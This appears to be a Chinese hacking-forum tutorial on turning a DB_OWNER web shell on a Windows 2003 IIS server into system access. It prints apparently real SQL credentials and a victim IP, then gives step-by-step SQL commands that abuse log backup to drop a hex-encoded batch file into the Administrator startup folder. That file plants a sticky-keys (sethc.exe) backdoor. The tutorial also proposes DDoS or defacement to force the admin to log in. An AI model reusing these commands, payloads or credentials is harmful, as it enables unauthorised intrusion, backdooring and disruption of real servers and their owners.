黑客教程--DB_OWNER提权
教程说明:S4T4N
HI.BAIDU.COM/HACKER___S
QQ:272709165
今天做个DB_OWNER OR SA提权的教程 。
这个其实是网上留传的那个备份BAT到启动项的那个脚本
网上好像大多是文字,没有人做过视屏教程,(其实我也不是很清楚,因为我从来不在
国内的站点看教程),如果有重复不好意思。
OK,找号了一个DB_OWNER权限的WEBSHELL
Windows2003,Microsoft-IIS/6.0,VBScript/5.6.8832
信息
找一下SQL用户密码
这个SQL密码什么的 大多在include目录或者 CONN的目录,自己找找看。
<%
Set DB = Server.CreateObject("ADODB.Connection")
A = "Provider=SQLOLEDB.1;Password=ksmm000;
Persist Security Info=True;User ID=ksmm;
Initial Catalog=ksmm;
Data Source=localhost"
Db.open A
用户:KSMM
密码:KSM000
IP:211.239.171.68
这个方法只适合 开了SQL外联的
刚才密码错了
exec master..xp_cmdshell 'ver'
XP_CMDSHELL不能实用 大多服务器XP_CMDSHELL不能用 许多人就放弃这一步了
还有就是组件问题,网上不少恢复组件的教程,其实恢复了组件也不一定能用。
下面的思路就是利用XP_DIRTREE来列目录
备份启动项不需要什么组件支持,所以这个方法差不多可以通杀 DB.
exec master..xp_dirtree 'c:\',1,1
列C盘目录
我们找出启动项
因为这个是韩国的服务器有些是韩文,
如果是中文的就好找一些,不知道启动在哪里的自己看自己电脑
用户
我们备份到Administrator的启动里去
这个今天备份了一次,给小驹(心动吧的那个骡子)演示了下
OK,找到启动项目
这里被我备份过了
start.bat
这个就是网上那个脚本
我们修改下 。。
这里有几处master 数据库
我们需要修改成当前服务器的数据库
这个数据库可以在啊D里面那个检测里面的数据库就是
列数据库的命令:SELECT DB_NAME()
我们替换吊脚本里面的MASTER
130A0D0A404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790D0A
这段是SHIFT脚本就是SHIFT后门
用HEX转的 16进制
/*利用Url或者sql查询器Log备份一句话或Bat*/
alter database [master] set RECOVERY FULL--
create table cmd (a image)--
backup log [master] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790D0A)--
backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'--
drop table cmd--
自己可以写一些需要的脚本BAT然后自己转HEX替换掉这里的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
脚本里面的路径修改一下 改成服务器de
就是吧SHIFT转成BAT脚本
名字随便写因为之前我写了一个START.bat的脚本,所以换了个名字
我们运行下
OK,列一下启动项的目录看看有没有MUJJ.BAT这个脚本
mujj.bat
OK
成功,这样只要ADMINISTARTTORS这个用户登陆一下就会运行我们的
SHIFT后门,有鸡的可以自己DDOS,没鸡的就修改下他的主页,让他被迫登陆
不过这样容易被发现。
自己随意。
只是个思路
然后可以在WEB根目录写一个再,然后自己下载运行下看看
此方法只适合2003 2000的直接写个BAT加用户的脚本就OK
好了,这样的话广大的菜鸟朋友就不会碰到DB拿不到系统发愁了。
现在居然还有好多牛JJ,拼命翻SA,没有SA就日不下站一样...
汗一个
教程下载地址:
[color=red][size=6][url=http://ishare.iask.sina.com.cn/cgi-bin/fileid.cgi?fileid=3581292][color=red][size=6]点击此处下载[/size][/color][/url][/size][/color]
页:
[1]